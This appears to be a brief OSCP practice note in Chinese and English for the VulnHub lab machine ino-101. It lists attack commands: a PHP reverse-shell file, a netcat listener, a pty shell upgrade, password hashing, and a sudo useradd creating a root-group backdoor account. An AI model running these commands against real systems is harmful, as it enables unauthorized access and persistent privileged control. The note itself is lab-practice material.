# Target complete - ino-101 1. https://www.vulnhub.com/entry/ino-101,601/ ``` > /usr/share/webshells/php/php-reverse-shell.php $nc -lvp 4444 ## 提權 $python -c 'import pty; pty.spawn("/bin/bash")' $python -c "import crypt: print crypt.crypt('password','password')" (查看有哪些 sudo 權限) $sudo -l $sudo useradd -m -G root,sudo -p papAq5PwY/QQM vulnhubroot ``` writeup: * https://www.alickgardiner.com/ino/ * https://zhuanlan.zhihu.com/p/354032363 ###### tags: `target` `OSCP`